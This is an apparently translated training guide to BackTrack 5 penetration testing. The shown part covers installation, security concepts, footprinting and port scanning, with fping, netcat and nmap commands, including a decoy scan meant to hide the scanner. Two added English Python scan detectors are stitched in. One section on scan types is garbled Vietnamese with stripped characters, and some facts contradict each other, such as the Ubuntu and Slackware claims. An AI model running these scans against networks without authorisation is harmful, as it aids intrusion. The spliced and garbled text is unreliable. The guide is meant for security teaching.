Athena - Using BackTrack 5 to Exploit Network Vulnerabilities (Athena-Su dung BackTrack 5 de khai thac lo hong mang.pdf)

GUIDE TO USING BACKTRACK 5 TO EXPLOIT NETWORK VULNERABILITIES AT THE ATHENA CENTER

FOREWORD

First, we would like to send our sincere thanks to Mr. Vo Do Thang, Director of the Athena Network Administration and Network Security Training Center, and to Mr. Le Dinh Nhan for their enthusiastic help in completing this document.

We also thank the consulting staff and technical support staff at the Athena Network Administration Training Center for their support and for making it possible to complete this network security project by the assigned deadline.

Respectfully,

The project team:
Nguyn Sn Kh
Ton Phat
Nguyen Cao Thang

TABLE OF CONTENTS

Opening chapter: INTRODUCTION TO BACKTRACK 5 ..... 6
  I. Introduction ..... 6
  II. Purpose ..... 6
  III. Where to download BackTrack ..... 7
  IV. Installation ..... 8
    1. Live DVD ..... 8
    2. Install ..... 8
Chapter 1: UNDERSTANDING LAN SECURITY ISSUES ..... 16
  I. Introduction ..... 16
  II. System and network security issues ..... 16
    1. General system and network security issues ..... 16
    2. Some concepts and history of system security ..... 16
    3. Types of security vulnerabilities and main network attack methods ..... 17
Chapter 2: FOOTPRINTING ..... 21
  I. Introduction to Footprinting ..... 21
  II. Footprinting steps ..... 21
    1. Determine our scope of activity ..... 21
    2. Publicly available information ..... 21
    3. Whois and DNS Enumeration ..... 21
    4. DNS interrogation ..... 22
    5. Network reconnaissance ..... 22
  III. Footprinting methods ..... 22
  IV. Footprinting tools ..... 25
    1. Sam Spade ..... 25
    2. Super Email Spider ..... 26
    3. VisualRoute Trace ..... 27
    4. Maltego ..... 27
Chapter 3: SCANNING ..... 28
  I. Introduction ..... 28
  II. Functions ..... 28
    1. Determining whether a system is alive ..... 28
    2. Determining which services are running or listening ..... 31
    3. Determining the operating system ..... 37
Chapter 4: ENUMERATION ..... 39
  I. What is Enumeration? ..... 39
  II. Banner Grabbing ..... 39
  III. Enumerating network services ..... 39
    1. HTTP fingerprinting ..... 39
    2. DNS Enumeration ..... 42
    3. NetBIOS name ..... 44
Chapter 5: PASSWORD CRACKING ..... 45
  I. Introduction ..... 45
  II. Password cracking techniques ..... 45
    1. Dictionary Attacks/Hybrid Attacks ..... 45
    2. Brute Forcing Attacks ..... 45
    3. Syllable Attacks/Pre-Computed Hashes ..... 45
  III. Common attack types ..... 45
    1. Active Password Cracking ..... 45
    2. Passive Password Cracking ..... 46
    3. Offline Password Cracking ..... 46
  IV. Password cracking tools ..... 46
    1. Hydra ..... 46
    2. Medusa ..... 48
  V. Password cracking against protocols ..... 51
    1. HTTP (HyperText Transfer Protocol) ..... 51
    2. SSH (Secure Shell) ..... 58
    3. SMB (Server Message Block) ..... 61
    4. RDP (Remote Desktop Protocol) ..... 64
Chapter 6: SYSTEM HACKING ..... 67
  I. Introduction to Metasploit ..... 67
    1. Introduction ..... 67
    2. Components of Metasploit ..... 67
    3. Using the Metasploit Framework ..... 67
    4. Introduction to the Meterpreter payload ..... 68
    5. Countermeasures ..... 70
  II. The MS10-046 (2286198) vulnerability ..... 70
    1. Introduction ..... 70
    2. Attack steps ..... 71
    3. Countermeasures ..... 79
  III. The BYPASSUAC vulnerability ..... 80
    1. Introduction ..... 80
    2. Attack steps ..... 80
    3. Countermeasures ..... 85
Chapter 7: WEB HACKING WITH DVWA ..... 86
  I. Introduction ..... 86
  II. Installing DVWA on BackTrack ..... 86
    1. Download and install XAMPP ..... 86
    2. Download and install DVWA ..... 88
  III. Attack techniques on DVWA ..... 92
    1. XSS (Cross-Site Scripting) ..... 92
    2. SQL Injection ..... 100
REFERENCES ..... 106

OPENING CHAPTER: INTRODUCTION TO BACKTRACK 5

I. Introduction

BackTrack is a Live DVD Linux distribution developed for penetration testing. In its Live DVD form we can run BackTrack directly from the DVD without installing it on our machine. BackTrack can also be installed to the hard disk and used as an operating system. BackTrack is the merger of three different penetration-testing Linux distributions: IWHAX, WHOPPIX, and Auditor. In its current version (5), BackTrack is based on the Ubuntu 11.10 Linux distribution. As of 19 July 2010, BackTrack 5 had been downloaded by more than 1.5 million users. The latest release is BackTrack 5 R2.

II. Purpose

The BackTrack toolset has a fairly long development history across several Linux bases. The current version uses the Slackware Linux distribution (Tomas M., www.slax.org). BackTrack continuously updates its tools, drivers and so on; at present it ships more than 300 tools for security research. BackTrack is the combination of two well-known security testing toolkits, Whax and Auditor.

BackTrack 5 contains a number of tools that can be used during our penetration tests. The penetration-testing tools in BackTrack 5.0 can be grouped as follows:

Information gathering: tools for obtaining information related to a target, such as DNS, routing, e-mail addresses, web sites, mail servers and so on. This information is collected from what is publicly available on the Internet, without touching the target environment.

Network mapping: tools for checking which hosts are up, the OS and applications used by the target, and for port scanning.

Vulnerability identification: tools for scanning for vulnerabilities (in general) and in Cisco devices. It also contains tools for working with and analysing Server Message Block (SMB) and Simple Network Management Protocol (SNMP).

Web application analysis: tools for examining and monitoring web applications.

Radio network analysis: tools for testing wireless networks, Bluetooth and radio-frequency identification (RFID).

Penetration: tools for exploiting the vulnerabilities found on target machines.

Privilege escalation: after exploiting a vulnerability and gaining access to a target machine, the tools in this group raise our privileges to the highest level.

Maintaining access: tools that help keep access to a target machine. We may need the highest privileges before we can install a tool to maintain access.

Voice over IP (VoIP): tools for analysing VoIP.

Digital forensics: tools for forensic analysis, such as acquiring a disk image, examining file structures and analysing the disk image. To use the tools in this group, choose Start BackTrack Forensics in the boot menu. Sometimes this requires mounting the internal hard disk and swap files read-only to preserve their integrity.

Reverse engineering: tools for debugging a program or disassembling an executable file.

III. Where to download BackTrack

BackTrack 5 can be downloaded from www.backtrack-linux.org/downloads/. Both a VMware image and an ISO file are available.

IV. Installation

1. Live DVD

If we want to use BackTrack without installing it on the hard disk, we can burn the ISO image to a DVD and boot the computer from it; BackTrack then runs from the DVD. The advantage of using BackTrack as a Live DVD is that it is very easy to do and we do not have to disturb the current configuration of the machine.

This method also has some drawbacks. BackTrack may not work with all hardware, and any configuration changes made while running it are not saved on the Live DVD. It is also slow, because the computer has to load programs from the DVD.

2. Install

a) Installing on a physical machine:

We need to prepare a partition on which to install BackTrack, then boot the BackTrack Live DVD. At the login screen we use the username root and the password toor. To enter the graphical environment we type startx, which starts the BackTrack 5 desktop.

To install BackTrack 5 to the hard disk, open the file named install.sh on the desktop and proceed with the installation. If that file cannot be found, we can install with ubiquity: open a Terminal and type ubiquity. The installer window then appears; answer a few questions (the city we live in, the keyboard layout, the disk partition to install on) and the installation proceeds.

b) Installing in a virtual machine:

The advantage is that we do not need to prepare a partition for BackTrack and can run another OS at the same time. The drawbacks are slower speed and no wireless support other than USB wireless adapters.

We can use the VMware image provided by BackTrack, which gives us BackTrack in a virtual machine quickly and easily. The configuration in the VMware image is 768 MB of memory, a 30 GB hard disk and NAT networking. To use the physical network card, the Network setting must be changed to Bridged.

Below are some screenshots from installing BackTrack in a VMware virtual machine. Create a new virtual machine and insert the BackTrack disc.

Installation screenshots (figure captions):

The BackTrack boot screen.

Type startx to enter the graphical environment in BackTrack.

To install, click the Install BackTrack file on the desktop.

Choose the language, then click Forward to continue.

Choose our location, then click Forward to continue.

Choose the keyboard layout, then click Forward to continue.

Choose the partition to install on.

Click Install to start the installation.

The installation begins.

When it finishes, just reboot and you are done.

CHAPTER 1: UNDERSTANDING LAN SECURITY ISSUES

I. Introduction

Computer network security is entirely a human problem, so setting out a legal framework and concrete working rules is necessary. Here the legal framework may include the relevant articles of national law and the regulations beneath it, while the concrete rules are set by each organisation to suit its own circumstances: rules on personnel, on the use of machines, on the use of software, and so on. Security for a computer network is therefore most effective once the policy on people is carried through thoroughly. In short, network security is a large problem that calls for an overall solution, not only software and hardware but also policy and people. It must be practised continuously; it is never finished, because new problems arise over time. With sensible overall measures, and above all with the human and policy side handled well, we can nevertheless make ourselves considerably more secure.

II. System and network security issues

1. General system and network security issues

A network system is characteristically shared by many users and geographically distributed, so protecting its resources (against loss or improper use) is far more complex than in the environment of a single computer or a single user. The network administrator must ensure that the information on the network is trustworthy and used for its intended purpose and audience, while keeping the network running stably and free from attack by those who would damage it. In practice no network is absolutely secure: however well a system is protected, there will be times when it is defeated by people with bad intentions.

2. Some concepts and history of system security

a) Network attackers (intruders)

These are individuals or organisations who use their knowledge of networks and destructive tools (hardware or software) to probe for weaknesses and security holes in a system, then break in and seize resources without authorisation. Some kinds of network attacker are:

Hacker: someone who breaks into a network illegally by using password-cracking tools or by exploiting weaknesses in the system's access components.

Masquerader: someone who forges information on the network, such as a spoofed IP address, domain name or user identity.

Eavesdropping: parties who listen in on network traffic, using sniffer tools and then analysis and debugging tools to extract valuable information.

Network attackers may have many different goals, such as stealing economically valuable information, deliberately sabotaging a network, or simply acting thoughtlessly.

b) Security vulnerabilities

Security vulnerabilities are weak points in a system, or hidden in a service, that an attacker can rely on to break into the system illegally and carry out destructive actions or seize resources unlawfully. They have many causes: faults in the system itself, in the software supplied, or a weak administrator who does not understand the services being provided in depth. Their impact on the system varies: some affect only the quality of the service provided, while others affect the whole system or destroy it.

c) Security policy

A security policy is the set of rules applied to the people who administer the network and use its resources and services. Each situation needs its own security policy. A security policy lets users know their responsibility for protecting network resources, and it also helps the network administrator establish effective safeguards when equipping, configuring and supervising the operation of the system and network.

3. Types of security vulnerabilities and main network attack methods

a) Types of vulnerabilities

Many organisations have classified the various kinds of vulnerability. According to the US Department of Defense, vulnerabilities fall into three classes:

Class C vulnerabilities

These allow denial-of-service (DoS) attacks. The danger level is low: they affect only the quality of service, stalling or interrupting the system, without damaging data or granting unauthorised access. DoS is a form of attack that uses the Internet-layer protocols of the TCP/IP suite to stall a system so that legitimate users are refused access to, or use of, it. Services with vulnerabilities that permit DoS attacks can be upgraded or patched with newer versions from the service vendors. At present there is no fully effective countermeasure against this kind of attack, because the design of the Internet layer (IP) in particular, and of the TCP/IP suite in general, carries the latent risk of this class of vulnerability.

Class B vulnerabilities

These allow a user to obtain additional rights on the system without any validity check, leading to the loss of information that should be kept confidential. They are usually found in the applications on a system and are of medium severity. A class B vulnerability is more dangerous than a class C one: it allows an internal user to gain higher privileges or illegitimate access.

Vulnerabilities of this class usually appear in the services on a system. A local user is understood to be someone who already has access to the system with certain limited rights. Another form of class B vulnerability occurs in programs written in C. C programs commonly use a buffer, an area of memory used to hold data before it is processed. The programmer typically uses the buffer in memory before assigning a memory area to each block of data. For example, when writing a program that reads a user-name field, the programmer may declare the field to be 20 characters long with the declaration:

char first_name[20];

This declaration lets the user enter at most 20 characters. The input is initially stored in the buffer. When the user enters more than 20 characters, the buffer overflows: the surplus characters land outside the buffer, where we cannot control them. Attackers can abuse such a hole by entering specially crafted characters to execute particular commands on the system. These vulnerabilities are usually exploited by users on the system to obtain root privileges illegitimately. To limit class B vulnerabilities, the system configuration and its programs must be controlled strictly.

Class A vulnerabilities

These allow someone outside the system to gain unauthorised access to it and can destroy the whole system. This class is extremely dangerous and threatens the integrity and confidentiality of the system. Such vulnerabilities usually appear on systems that are poorly administered or whose network configuration is not under control. They are especially dangerous because they already exist in the software in use; an administrator who does not understand the services and software in depth can overlook them. For this reason, the advisories of the security newsgroups should be checked regularly to detect this class of vulnerability. A range of older program versions in common use have class A vulnerabilities, including FTP, Gopher, Telnet, Sendmail, ARP and finger.

b) Common forms of network attack

Scanner

A scanner is a program that automatically probes for and detects security weaknesses on a local workstation or a remote one. An attacker using a scanner can discover security holes on a server even from far away. It works by probing for the TCP/UDP ports in use on the target system and the services running on them. The scanner records the responses of the remote system for each service it detects, and from these it can find the system's weak points. A scanner needs the following to operate: an environment that supports TCP/IP, and a system connected to the Internet. Scanners play an important role in a security system, because they can reveal the weak points of a network.

Password Cracker

A password cracker is a program that can recover an encrypted password or disable a system's password protection. Cracking programs work on different principles. Some generate a limited word list, apply an encryption algorithm to it and compare the results with the encrypted password to be cracked, then generate a further list according to the program's logic. When a match with the encrypted password is found, the attacker has the password in plain text, and the plain-text password is usually written to a file. The countermeasure against this kind of attack is to build a sound password protection policy.

Sniffer

Sniffers are tools (hardware or software) that capture the information flowing across a network and extract the valuable information exchanged on it. A sniffer can capture traffic exchanged between many workstations. It captures packets from the IP layer down; because the IP-layer protocols are publicly defined and their header fields are clearly structured, decoding these packets is not difficult.

The aim of a sniffer program is to set promiscuous mode on an Ethernet card, where the packets exchanged on the network pass, and so "catch" the information. Sniffer devices can capture all the traffic on the network because packets in an Ethernet network are broadcast. Setting up a sniffer is not simple, however, since it requires breaking into the network and installing the sniffer software, and sniffer programs also demand that the user understand network architecture and protocols in depth. Detecting that a system is being sniffed is not simple either, because a sniffer works at a very low layer and does not affect the applications or services the system provides. Even so, building measures that limit sniffing is not too hard if we follow security principles such as:

Do not let strangers access the devices on the system.

Manage the system configuration strictly.

Set up highly secure connections through encryption mechanisms.

Trojans

A Trojan is a program running illegitimately on a system in the guise of a legitimate program. It can run because a legitimate program's code has been altered to include illegitimate code. Viruses are a typical example: they hide code segments inside legitimately used programs, and when those programs are activated the hidden code executes and performs functions the user does not know about, such as stealing passwords or copying files without the user's knowledge. A Trojan program does one of the following:

Performs some functions, or helps its programmer discover important or personal information on a system or only on some components of that system.

Hides some functions, or helps its programmer discover important or personal information on a system or only on some components of it.

There are also Trojans that do both. Some Trojans can even destroy a system by damaging the information on the hard disk, but today Trojans of this kind are easily detected and rarely effective. More serious cases occur when attackers create security holes through Trojans, obtain root privileges on the system and use them to destroy part or all of it, or use root to alter log files and install further Trojans that the administrator cannot detect; the impact is then very serious and the administrator has no option but to reinstall the entire system.

CHAPTER 2: FOOTPRINTING

I. Introduction to Footprinting

Footprinting is a technique for gathering information about a business, individual or organisation. It is one of the three phases that must be carried out to perform an attack. An attacker spends 90% of the effort collecting and searching for information and 10% carrying out the attack.

The result of footprinting is the target's basic information: name, company address, web site, company members, network diagram, and so on.

Information to look for:

Internet: domain, network blocks, IP addresses, TCP or UDP services, system enumeration, ACLs, IDSes, and so on.

Intranet.

Remote access: remote system type, and so on.

Extranet: connection origination and destination, and so on.

II. Footprinting steps

The steps are as follows:

1. Determine our scope of activity

The first order of business is to determine the scope of our footprinting activities. Identifying all the entities in an organisation can be a daunting task, but hackers have no sympathy for our struggle: they exploit weaknesses in whatever form they find them. We do not want a hacker to know much about our security posture.

2. Publicly available information

The amount of information readily available about us, our organisation and anything else we can imagine is nothing short of amazing. It may include the company web site, related organisations, physical location, employee details, current events, and security and privacy policies.

3. Whois and DNS Enumeration

Look up the details of IP addresses, name servers and DNS servers.

4. DNS interrogation

After identifying all the related domains, we begin querying DNS. DNS is a distributed database that maps IP addresses to hostnames. If DNS is not configured securely, there is a good chance of obtaining information leaked from the organisation.

5. Network reconnaissance

Now that we have identified the potential networks, we can determine the network topology and the likely access paths into the network.

III. Footprinting methods

There are two ways to perform footprinting:

Active footprinting: contact the target directly to learn the required information.

Passive footprinting: search through articles, web sites, the target's competitors, and so on.

Web sites: www.google.com, http://whois.domaintools.com, www.whois.net, www.tenmien.vn, www.arcchive.org, and so on.

Screenshots (figure captions): Whois lookup of athena.com.vn; Tenmien.vn; Archive lookup of http://www.microsoft.com.

IV. Footprinting tools

Sam Spade, Super Email Spider, VisualRoute Trace, Google Earth, Whois, SiteDigger, Maltego, and so on.

1. Sam Spade

Lets the user carry out actions such as Ping, Nslookup, Whois and Traceroute.

2. Super Email Spider

Searches for the e-mail addresses of an organisation using search engines: Google, Lycos, iWon, Excite, HotBot, MSN, AOL, and so on.

3. VisualRoute Trace

Displays the links, addresses and regions a connection passes through.

4. Maltego

A tool for discovering links between users, agencies, organisations, web sites, domains, network ranges, IP addresses, and so on.

CHAPTER 3: SCANNING

I. Introduction

If footprinting is finding out where the information sources are, scanning is finding all the doors through which those sources can be entered. During footprinting we obtained a list of IP network ranges and IP addresses through various techniques, including whois and ARIN queries. These techniques give the security administrator, as well as the hacker, much valuable information about the target network, IP ranges, DNS servers and mail servers. In this chapter we determine which systems are listening on the network and reachable, using tools and techniques such as ping sweeps and port scans. We can also bypass firewalls to scan systems that are supposedly locked down by filtering rules.

II. Functions

1. Determining whether a system is alive

One of the basic steps in mapping a network is a ping sweep over a network range or set of IP addresses to determine whether devices or systems are alive. Ping usually sends ICMP ECHO packets to the target system and tries to receive an ICMP ECHO REPLY, which shows that the system is up. Ping is acceptable for determining how many live systems there are in a small or medium-sized network (a class C network has 254 addresses, a class B 65534), but it can take hours or days to complete for a class A network with 16277214 addresses.

a) Network ping sweeps

Network pinging is the act of sending various kinds of network traffic to a target and analysing the result. Pinging uses ICMP (Internet Control Message Protocol), but TCP or UDP can also be used to find live hosts.

To perform an ICMP ping sweep we can use fping, nmap and similar tools:

fping -a -g 192.168.10.1 192.168.10.10

-a: show hosts that are alive
-g: generate the address range, either 192.168.10.0/24 or a start and end address as above

nmap -sP -PE 192.168.10.0/24

-sP: ping scan
-PE: ICMP echo ping

Countermeasure: we can use pingd to handle all ICMP ECHO and ICMP ECHO REPLY traffic at the host level. This is achieved by removing ICMP ECHO processing from the kernel; in essence it provides a system-level access-control mechanism.

b) ICMP queries

Ping sweeps (ICMP ECHO packets) are only the tip of the iceberg when it comes to the ICMP information a system gives away. We can gather several kinds of valuable information simply by sending ICMP packets. We can request a device's netmask with an Address Mask Request. The netmask matters because it lets us work out all of the target's addresses, the default gateway and the broadcast address. Knowing the default gateway, we can attack the router; the broadcast address is useful in the same way. Not every router supports the Time (timestamp) and Netmask requests, however.

Countermeasure: block the ICMP types that give away information at the border router (the router facing the ISP). To keep this to a minimum, we should use access lists (ACLs):

access-list 101 deny icmp any any 13   // timestamp request
access-list 101 deny icmp any any 17   // address mask request
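To turn the ping-sweep and ICMP-query discussion above into something a defender can run, here is an added Python example (not code from the original document or from the BackTrack project) that parses constructed firewall-style ICMP log lines, flags a source that echo-probes many hosts in a short window, and lists the timestamp and address-mask requests that the two ACL entries above are meant to drop. The log format, the addresses, the thresholds and the edge_acl_verdict helper are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines in a generic firewall/IDS style (not from the
# original document): ICMP packets seen at the edge, one record per line.
SAMPLE_LOG = """\
2024-03-01T08:00:00 ICMP src=203.0.113.9 dst=192.168.10.1 type=8 code=0
2024-03-01T08:00:00 ICMP src=203.0.113.9 dst=192.168.10.2 type=8 code=0
2024-03-01T08:00:01 ICMP src=203.0.113.9 dst=192.168.10.3 type=8 code=0
2024-03-01T08:00:01 ICMP src=203.0.113.9 dst=192.168.10.4 type=8 code=0
2024-03-01T08:00:02 ICMP src=203.0.113.9 dst=192.168.10.5 type=8 code=0
2024-03-01T08:00:02 ICMP src=203.0.113.9 dst=192.168.10.6 type=8 code=0
2024-03-01T08:00:05 ICMP src=203.0.113.9 dst=192.168.10.1 type=17 code=0
2024-03-01T08:00:05 ICMP src=203.0.113.9 dst=192.168.10.1 type=13 code=0
2024-03-01T08:03:00 ICMP src=198.51.100.4 dst=192.168.10.7 type=8 code=0
2024-03-01T08:03:30 ICMP src=192.168.10.7 dst=198.51.100.4 type=0 code=0
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) ICMP src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) "
    r"type=(?P<type>\d+) code=(?P<code>\d+)$"
)

# ICMP types the chapter discusses: echo (ping sweeps) and the two
# information queries the edge ACL is meant to drop.
ICMP_NAMES = {0: "echo-reply", 8: "echo-request",
              13: "timestamp-request", 17: "address-mask-request"}
EDGE_ACL_DENY_TYPES = {13, 17}   # mirrors "deny icmp any any 13 / 17"


def parse_icmp_log(text):
    """Turn log lines into event dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "src": m["src"], "dst": m["dst"],
            "type": int(m["type"]), "code": int(m["code"]),
        })
    return events


def detect_ping_sweeps(events, min_hosts=5, window=timedelta(seconds=10)):
    """Sources that sent echo-requests to >= min_hosts distinct hosts within
    any sliding window of `window` seconds. Returns {src: max distinct hosts}."""
    per_src = defaultdict(list)
    for e in events:
        if e["type"] == 8:
            per_src[e["src"]].append((e["ts"], e["dst"]))
    sweeps = {}
    for src, probes in per_src.items():
        probes.sort()
        best = 0
        for i, (t0, _) in enumerate(probes):
            hosts = {d for t, d in probes[i:] if t - t0 <= window}
            best = max(best, len(hosts))
        if best >= min_hosts:
            sweeps[src] = best
    return sweeps


def detect_info_queries(events):
    """Timestamp / address-mask requests reaching the edge: each one is
    reconnaissance that the chapter's ACL entries are supposed to block."""
    return [(e["src"], e["dst"], ICMP_NAMES[e["type"]])
            for e in events if e["type"] in EDGE_ACL_DENY_TYPES]


def edge_acl_verdict(event):
    """'deny' if the page's two ACL entries would match this packet, else
    'permit' (a real ACL would need a trailing permit for other traffic,
    since Cisco ACLs end with an implicit deny)."""
    return "deny" if event["type"] in EDGE_ACL_DENY_TYPES else "permit"


if __name__ == "__main__":
    evs = parse_icmp_log(SAMPLE_LOG)
    print("ping sweeps:", detect_ping_sweeps(evs))
    print("info queries:", detect_info_queries(evs))
    print("verdicts:", [edge_acl_verdict(e) for e in evs])
```

With the constructed log, 203.0.113.9 is reported as a sweep (six hosts in two seconds) and its two follow-up queries are listed as exactly the packets the ACL would drop, while the single echo from 198.51.100.4 and its reply stay below the threshold. The window and host count are the knobs to tune against normal monitoring traffic in your own environment.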

2. Determining which services are running or listening

a) Port scanning

Port scanning is the process of sending packets to the TCP and UDP ports of a target system to determine which services are running or in a listening state. Identifying listening ports is essential for identifying the services that are running. In addition, we can determine the type and version of the operating system and the applications in use.

    b) Cc Loi Scan

    Trc khi thc hin port scanning, chng ta nn im qua mt s cch thc

    qut sn c:

    TCP Connect scan: loi ny kt ni ti cng ch v thc hin y

    quy trnh bt tay ba bc (SYN, SYN/ACK, ACK). Tuy nhin iu ny

    th d dng b pht hin bi h thng ch. N s dng li gi h thng

    thay cho cc gi tin sng (raw packets) v thng c s dng bi

    nhng ngi dng Unix khng c quyn.V SYN Scan khng th thc

    hin c.

    TCP SYN scan: n khng to ra mt kt ni ti ngun m ch gi gi

    tin SYN(bc u tin trong ba bc to kt ni) ti ch. Nu a gi tin

    SYN/ACK c tr v th chng ta bit c cng ang lng nghe.

    Ngc li, nu nhn c RST/ACK th cng khng lng nghe. K

    thut ny kh b pht hin hn l TCP connect v n khng lu li

  • 32

    thng tin my tnh ch. Tuy nhin, mt trong nhng nhc im ca

    k thut ny l c th to ra iu kin t chi dch v DoS nu c qu

    nhiu kt ni khng y c to ra. V vy, k thut ny l an ton

    nu khng c qu nhiu kt ni nh trn c to ra.

    TCP ACK Scan: k thut ny c dng vch ra cc quy tt thit lp

    tng la. n c th gip xc nh xem tng la l trnh trch lc cc

    gi tin n gin cho php to kt ni hay l trnh trch lc nng cao.

    Tuy nhin n khng th phn bit c cng no open hay closed.

    TCP Windows Scan: Ging vi ACK Scan, im khc l n c th pht

    hin cng open vi closed.

    UDP Scan: k thut ny gi mt gi tin UDP ti cng ch. Nu cng

    ch tr li vi thng ip ICMP port unreachable th cng closed.

    Nu khng nhn c thng ip trn th cng trn ang m. Tuy

    nhin, UDP scan l mt qu trnh rt chp nu nh chng ta c gng

    scan mt thit b no m c p chnh sch trch lc gi tin mnh.

    TCP FIN, XMAS, NULL: chng chuyn nghip trong vic ln lt vt

    tng la khm ph cc h thng pha sau. Tuy nhin, chng li

    ph thuc nhiu vo cch x l ca h thng ch m(in hnh l

    Windows) th khng c biu hin g.
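The handshake differences just described are exactly what a defender can use to recognise a scan in captured traffic. The following added example (not part of the original document) tracks each SYN through the exchange and labels a source that probes many ports as a connect scan, a SYN scan or an undetermined sweep; the packet records and addresses are constructed.

```python
"""Detect TCP connect and SYN (half-open) scans from simplified packet records.

Added example, not from the original document. Each record is a constructed
tuple (timestamp, src_ip, src_port, dst_ip, dst_port, flags), with flags as
TCP flag letters ("S", "SA", "A", "R", "RA"); a real deployment would derive
them from a packet capture or a flow export.
"""
from collections import defaultdict

SCAN_PORT_THRESHOLD = 5    # distinct ports probed on one host by one source...
SCAN_WINDOW_SECONDS = 10   # ...within this many seconds
LISTENING_STATES = {"syn_ack", "half_open", "completed"}


def classify_flows(packets):
    """Track each client->server:port flow through the handshake.

    Returns (states, first_seen): states maps (client, server, port) to
      'unanswered' - SYN sent, nothing came back (filtered or dropped)
      'closed'     - server replied RST/ACK (port not listening)
      'syn_ack'    - server replied SYN/ACK, client never answered
      'half_open'  - SYN/ACK answered by RST: the SYN-scan signature
      'completed'  - SYN, SYN/ACK, ACK: full handshake (connect scan or real client)
    and first_seen maps the same key to the timestamp of its SYN.
    """
    states, first_seen = {}, {}
    for ts, src, sport, dst, dport, flags in sorted(packets, key=lambda p: p[0]):
        if flags == "S":                       # a client opens a flow
            states.setdefault((src, dst, dport), "unanswered")
            first_seen.setdefault((src, dst, dport), ts)
            continue
        if (src, dst, dport) in states:        # later packet from the client
            key, from_client = (src, dst, dport), True
        elif (dst, src, sport) in states:      # reply from the server
            key, from_client = (dst, src, sport), False
        else:
            continue                           # not part of a tracked flow
        state = states[key]
        if not from_client and state == "unanswered" and flags == "SA":
            states[key] = "syn_ack"
        elif not from_client and state == "unanswered" and flags == "RA":
            states[key] = "closed"
        elif from_client and state == "syn_ack" and flags == "A":
            states[key] = "completed"
        elif from_client and state == "syn_ack" and flags == "R":
            states[key] = "half_open"
    return states, first_seen


def detect_scans(packets, threshold=SCAN_PORT_THRESHOLD, window=SCAN_WINDOW_SECONDS):
    """Return (src, dst, kind, probed_ports, listening_ports) per scanning source.

    kind is 'connect_scan' when at least one probe completed the handshake,
    'syn_scan' when probes were torn down before the ACK, and 'port_sweep'
    when every probed port was closed or silent (technique undetermined).
    """
    states, first_seen = classify_flows(packets)
    per_pair = defaultdict(list)
    for key, state in states.items():
        src, dst, port = key
        per_pair[(src, dst)].append((first_seen[key], port, state))
    findings = []
    for (src, dst), probes in per_pair.items():
        probes.sort()
        for i, (start, _, _) in enumerate(probes):
            burst = [p for p in probes[i:] if p[0] - start <= window]
            if len(burst) < threshold:
                continue
            kinds = {p[2] for p in burst}
            if "completed" in kinds:
                kind = "connect_scan"
            elif kinds & {"half_open", "syn_ack"}:
                kind = "syn_scan"
            else:
                kind = "port_sweep"
            probed = sorted(p[1] for p in burst)
            listening = sorted(p[1] for p in burst if p[2] in LISTENING_STATES)
            findings.append((src, dst, kind, probed, listening))
            break                              # one finding per (src, dst) pair
    return findings


def _probe(ts, client, sport, server, port, reply, followup=None):
    """Packets of one probe: SYN, the server's reply, optional client follow-up."""
    pkts = [(ts, client, sport, server, port, "S"),
            (ts + 0.01, server, port, client, sport, reply)]
    if followup:
        pkts.append((ts + 0.02, client, sport, server, port, followup))
    return pkts


# Constructed capture: a SYN scan (RST after SYN/ACK), a connect scan (ACK
# after SYN/ACK), and one ordinary client connecting to a single port.
SAMPLE_PACKETS = []
for i, (port, reply, fu) in enumerate([(21, "RA", None), (22, "SA", "R"), (23, "RA", None),
                                       (25, "RA", None), (80, "SA", "R"), (443, "RA", None)]):
    SAMPLE_PACKETS += _probe(1.0 + i * 0.1, "10.0.0.5", 40000 + i, "192.168.10.102", port, reply, fu)
for i, (port, reply, fu) in enumerate([(22, "RA", None), (25, "RA", None), (80, "SA", "A"),
                                       (443, "RA", None), (8080, "RA", None)]):
    SAMPLE_PACKETS += _probe(5.0 + i * 0.1, "10.0.0.9", 50000 + i, "192.168.10.50", port, reply, fu)
SAMPLE_PACKETS += _probe(9.0, "10.0.0.7", 51515, "192.168.10.102", 80, "SA", "A")

if __name__ == "__main__":
    for finding in detect_scans(SAMPLE_PACKETS):
        print(finding)
```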

c) Identifying the running TCP and UDP services

Strobe: highly reliable, but supports only TCP, not UDP.

Netcat is a simple Unix networking utility that reads and writes data across network connections using the TCP/IP protocol. It is designed as a reliable "back-end" tool that can be used directly or driven easily by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool.

    nc -v -z -w2 192.168.10.102 1-4000

-v: verbose output
-z: zero-I/O mode, sends no data and only emits a connection probe
192.168.10.102: the host
1-4000: the ports to scan

Nmap (Network Mapper) is a free, open-source utility for network discovery and security auditing. Many network and system administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine which hosts are available on the network, which services (application name and version) those hosts offer, which operating systems (and OS versions) they run, which packet filters or firewalls are in use, and dozens of other characteristics. It was designed to scan large networks quickly, but works fine against single hosts. Nmap runs on all major operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.

The simplest usage, with no options at all: nmap 192.168.10.0/24

The process is carried out as follows:

a. Convert the hostname to an IPv4 address using DNS. If an IP address was given, no conversion is needed.
b. Ping the host, by default with an ICMP echo request and a TCP ACK packet to port 80, to determine whether the host is up. If it is not, nmap exits with a message. We can use the "ping none" option (-PN) to skip this step.
c. Convert the target IP back to a name with a reverse DNS query. This can be skipped with -n to improve speed and stealth.
d. Run a TCP port scan of the 1000-odd most common ports listed in nmap-services. A SYN scan is performed, but a Connect scan is used instead when a non-root Unix user lacks the privileges needed to send raw packets.
e. Print the results to the screen.

Scanning for hosts that are up: nmap -sP -PE 192.168.10.0/24

-sP: ping scan
-PE: ping echo

Depending on the complexity of the target network and its hosts, the scan can easily be detected. Nmap can disguise the source address with the -D decoy option, which was created to flood the target site with forged information. The basic idea behind the option is to run fake scans at the same time as the real one: the target system replies to the decoy addresses as well as to our real port scan. Most importantly, the decoy addresses must belong to live hosts; otherwise the SYN scan will lead to a denial-of-service condition.

    nmap -sS -PE 192.168.10.0/24 -D 10.10.10.1

d) Countermeasures

Turn off all unnecessary services. On Unix, we can do this by reviewing the unnecessary services in /etc/inetd.conf and disabling the corresponding services and startup scripts. On Windows, it is very hard to turn off unnecessary services because, by the way Windows works, TCP ports 139 and 445 provide many of the functions Windows needs to operate.

